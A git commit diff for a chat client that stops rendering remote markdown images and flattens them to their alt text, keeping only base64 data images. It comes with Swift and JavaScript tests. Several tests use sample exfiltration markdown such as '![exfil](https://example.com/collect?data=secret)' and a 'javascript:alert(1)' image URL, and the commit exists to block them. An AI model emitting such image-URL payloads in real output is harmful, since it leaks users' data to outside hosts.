fix: flatten remote markdown images

This commit is contained in:
Ayaan Zaidi
2026-03-07 19:16:11 +05:30
committed by Ayaan Zaidi
parent 53a7e3b6e5
commit 4bf902de58
6 changed files with 133 additions and 19 deletions

View File

@@ -13,6 +13,8 @@ enum ChatMarkdownPreprocessor {
"Chat history since last reply (untrusted, for context):",
]
private static let markdownImagePattern = #"!\[([^\]]*)\]\(([^)]+)\)"#
struct InlineImage: Identifiable {
let id = UUID()
let label: String
@@ -27,8 +29,7 @@ enum ChatMarkdownPreprocessor {
static func preprocess(markdown raw: String) -> Result {
let withoutContextBlocks = self.stripInboundContextBlocks(raw)
let withoutTimestamps = self.stripPrefixedTimestamps(withoutContextBlocks)
let pattern = #"!\[([^\]]*)\]\((data:image\/[^;]+;base64,[^)]+)\)"#
guard let re = try? NSRegularExpression(pattern: pattern) else {
guard let re = try? NSRegularExpression(pattern: self.markdownImagePattern) else {
return Result(cleaned: self.normalize(withoutTimestamps), images: [])
}
@@ -44,24 +45,41 @@ enum ChatMarkdownPreprocessor {
for match in matches.reversed() {
guard match.numberOfRanges >= 3 else { continue }
let label = ns.substring(with: match.range(at: 1))
let dataURL = ns.substring(with: match.range(at: 2))
let image: OpenClawPlatformImage? = {
guard let comma = dataURL.firstIndex(of: ",") else { return nil }
let b64 = String(dataURL[dataURL.index(after: comma)...])
guard let data = Data(base64Encoded: b64) else { return nil }
return OpenClawPlatformImage(data: data)
}()
images.append(InlineImage(label: label, image: image))
let source = ns.substring(with: match.range(at: 2))
let start = cleaned.index(cleaned.startIndex, offsetBy: match.range.location)
let end = cleaned.index(start, offsetBy: match.range.length)
cleaned.replaceSubrange(start..<end, with: "")
if let inlineImage = self.inlineImage(label: label, source: source) {
images.append(inlineImage)
cleaned.replaceSubrange(start..<end, with: "")
} else {
cleaned.replaceSubrange(start..<end, with: self.fallbackImageLabel(label))
}
}
return Result(cleaned: self.normalize(cleaned), images: images.reversed())
}
/// Builds an `InlineImage` from a markdown image source when that source is a
/// base64 `data:image/...` URL.
///
/// - Parameters:
///   - label: Alt text captured from the markdown image syntax.
///   - source: Raw text captured between the parentheses of the markdown image.
/// - Returns: `nil` when `source` is not a base64 image data URL; otherwise an
///   `InlineImage` whose `image` is `nil` if the payload does not decode into an image.
private static func inlineImage(label: String, source: String) -> InlineImage? {
    let candidate = source.trimmingCharacters(in: .whitespacesAndNewlines)

    // Everything before the first comma is the data-URL header; the rest is the payload.
    guard let separator = candidate.firstIndex(of: ",") else { return nil }
    let header = candidate[..<separator]
    let headerMatch = header.range(
        of: #"^data:image\/[^;]+;base64$"#,
        options: [.regularExpression, .caseInsensitive])
    if headerMatch == nil {
        return nil
    }

    let payload = String(candidate[candidate.index(after: separator)...])
    guard let decoded = Data(base64Encoded: payload) else {
        // A recognised header with an undecodable payload still yields an entry, just without an image.
        return InlineImage(label: label, image: nil)
    }
    return InlineImage(label: label, image: OpenClawPlatformImage(data: decoded))
}
/// Returns the plain text used in place of a markdown image that is not rendered inline.
///
/// - Parameter label: Alt text captured from the markdown image syntax.
/// - Returns: `label` with surrounding whitespace and newlines removed, or `"image"`
///   when nothing remains after trimming.
private static func fallbackImageLabel(_ label: String) -> String {
    let text = label.trimmingCharacters(in: .whitespacesAndNewlines)
    guard !text.isEmpty else { return "image" }
    return text
}
private static func stripInboundContextBlocks(_ raw: String) -> String {
guard self.inboundContextHeaders.contains(where: raw.contains) else {
return raw

View File

@@ -18,6 +18,30 @@ struct ChatMarkdownPreprocessorTests {
#expect(result.images.first?.image != nil)
}
/// A remote image is reduced to its label text while a base64 data image
/// in the same input is still extracted as an inline image.
@Test func flattensRemoteMarkdownImagesIntoText() {
    // Base64 payload used for the inline data image below.
    let pngPayload = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQIHWP4////GQAJ+wP/2hN8NwAAAABJRU5ErkJggg=="
    let input = """
    ![Leak](https://example.com/collect?x=1)
    ![Pixel](data:image/png;base64,\(pngPayload))
    """

    let output = ChatMarkdownPreprocessor.preprocess(markdown: input)

    // Only the remote image's label survives in the text.
    #expect(output.cleaned == "Leak")
    // Exactly one inline image is extracted, and it decoded successfully.
    #expect(output.images.count == 1)
    #expect(output.images.first?.image != nil)
}
/// A remote image with empty alt text is replaced by the literal word "image"
/// and produces no inline image entries.
@Test func usesFallbackTextForUnlabeledRemoteMarkdownImages() {
    let input = "![](https://example.com/image.png)"

    let output = ChatMarkdownPreprocessor.preprocess(markdown: input)

    #expect(output.cleaned == "image")
    #expect(output.images.isEmpty)
}
@Test func stripsInboundUntrustedContextBlocks() {
let markdown = """
Conversation info (untrusted metadata):

View File

@@ -1712,6 +1712,22 @@
return text.replace(/<(?=[a-zA-Z/])/g, "&lt;");
}
// Matches, case-insensitively, strings that START with a base64 image data-URL
// header ("data:image/<subtype>;base64,"). Only the prefix is checked; the
// payload after the comma is not validated by this pattern.
const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i;
/**
 * Produces the display label for a markdown image.
 *
 * @param {unknown} text - Alt text from the image token; non-strings are treated as empty.
 * @returns {string} The trimmed text, or "image" when it is empty or not a string.
 */
function normalizeMarkdownImageLabel(text) {
  if (typeof text !== "string") {
    return "image";
  }
  const label = text.trim();
  return label === "" ? "image" : label;
}
/**
 * Renders a markdown image token as HTML.
 *
 * Only hrefs matching INLINE_DATA_IMAGE_RE produce an <img> element; any other
 * href (including a missing or non-string one) is reduced to the escaped label text.
 *
 * @param {{ href?: unknown, text?: unknown } | null | undefined} token - Image token.
 * @returns {string} Either an <img> tag with escaped src/alt, or the escaped label.
 */
function renderMarkdownImage(token) {
  const altText = normalizeMarkdownImageLabel(token?.text);
  const rawHref = token?.href;
  const source = typeof rawHref === "string" ? rawHref.trim() : "";
  if (INLINE_DATA_IMAGE_RE.test(source)) {
    return `<img src="${escapeHtml(source)}" alt="${escapeHtml(altText)}">`;
  }
  return escapeHtml(altText);
}
// Configure marked with syntax highlighting and HTML escaping for text
marked.use({
breaks: true,
@@ -1750,6 +1766,9 @@
html(token) {
return escapeHtml(token.text);
},
image(token) {
return renderMarkdownImage(token);
},
},
});

View File

@@ -250,4 +250,38 @@ describe("export html security hardening", () => {
expect(img?.getAttribute("onerror")).toBeNull();
expect(img?.getAttribute("src")).toBe("data:application/octet-stream;base64,AAAA");
});
it("flattens remote markdown images but keeps data-image markdown", () => {
  const dataImage = "data:image/png;base64,AAAA";
  // One remote image (expected to be flattened to text) followed by one inline
  // data image (expected to survive as an <img>).
  const assistantText = `Leak:\n\n![exfil](https://example.com/collect?data=secret)\n\n![pixel](${dataImage})`;
  const session: SessionData = {
    header: { id: "session-4", timestamp: now() },
    entries: [
      {
        id: "1",
        parentId: null,
        timestamp: now(),
        type: "message",
        message: {
          role: "assistant",
          content: [{ type: "text", text: assistantText }],
        },
      },
    ],
    leafId: "1",
    systemPrompt: "",
    tools: [],
  };

  const { document } = renderTemplate(session);
  const container = document.getElementById("messages");

  expect(container).toBeTruthy();
  // No <img> may point at a remote https URL, but the label text must remain.
  expect(container?.querySelector('img[src^="https://"]')).toBeNull();
  expect(container?.textContent).toContain("exfil");
  // The inline data image is still rendered as an <img>.
  expect(container?.querySelector(`img[src="${dataImage}"]`)).toBeTruthy();
});
});

View File

@@ -30,11 +30,10 @@ describe("toSanitizedMarkdownHtml", () => {
expect(html).toContain("console.log(1)");
});
it("preserves img tags with src and alt from markdown images (#15437)", () => {
it("flattens remote markdown images into alt text", () => {
const html = toSanitizedMarkdownHtml("![Alt text](https://example.com/image.png)");
expect(html).toContain("<img");
expect(html).toContain('src="https://example.com/image.png"');
expect(html).toContain('alt="Alt text"');
expect(html).not.toContain("<img");
expect(html).toContain("Alt text");
});
it("preserves base64 data URI images (#15437)", () => {
@@ -43,11 +42,17 @@ describe("toSanitizedMarkdownHtml", () => {
expect(html).toContain("data:image/png;base64,");
});
it("strips javascript image urls", () => {
it("flattens non-data markdown image urls", () => {
const html = toSanitizedMarkdownHtml("![X](javascript:alert(1))");
expect(html).toContain("<img");
expect(html).not.toContain("<img");
expect(html).not.toContain("javascript:");
expect(html).not.toContain("src=");
expect(html).toContain("X");
});
it("uses a plain fallback label for unlabeled markdown images", () => {
  const html = toSanitizedMarkdownHtml("![](https://example.com/image.png)");
  expect(html).not.toContain("<img");
  // "image" is also a substring of the URL's file name ("image.png"), so the
  // positive check below would pass even if the URL were echoed back as text.
  // Require that no part of the remote URL appears in the output.
  expect(html).not.toContain("example.com");
  expect(html).toContain("image");
});
it("renders GFM markdown tables (#20410)", () => {

View File

@@ -43,6 +43,7 @@ const MARKDOWN_CHAR_LIMIT = 140_000;
const MARKDOWN_PARSE_LIMIT = 40_000;
const MARKDOWN_CACHE_LIMIT = 200;
const MARKDOWN_CACHE_MAX_CHARS = 50_000;
// Matches, case-insensitively, strings that START with a base64 image data-URL
// header ("data:image/<subtype>;base64,"). Only the prefix is checked; the
// payload after the comma is not validated by this pattern.
const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i;
const markdownCache = new Map<string, string>();
function getCachedMarkdown(key: string): string | null {
@@ -137,6 +138,19 @@ export function toSanitizedMarkdownHtml(markdown: string): string {
// pages) as formatted output is confusing UX (#13937).
const htmlEscapeRenderer = new marked.Renderer();
htmlEscapeRenderer.html = ({ text }: { text: string }) => escapeHtml(text);
// Image renderer: only hrefs matching INLINE_DATA_IMAGE_RE become an <img>;
// every other href is replaced by its escaped label text, so no <img> is
// emitted for it.
htmlEscapeRenderer.image = (token: { href?: string | null; text?: string | null }) => {
  const altText = normalizeMarkdownImageLabel(token.text);
  const source = (token.href ?? "").trim();
  if (INLINE_DATA_IMAGE_RE.test(source)) {
    return `<img src="${escapeHtml(source)}" alt="${escapeHtml(altText)}">`;
  }
  return escapeHtml(altText);
};
/**
 * Produces the display label for a markdown image.
 *
 * @param text - Alt text from the image token; may be missing or null.
 * @returns The trimmed text, or "image" when it is missing or blank.
 */
function normalizeMarkdownImageLabel(text?: string | null): string {
  const label = (text ?? "").trim();
  if (label.length === 0) {
    return "image";
  }
  return label;
}
function escapeHtml(value: string): string {
return value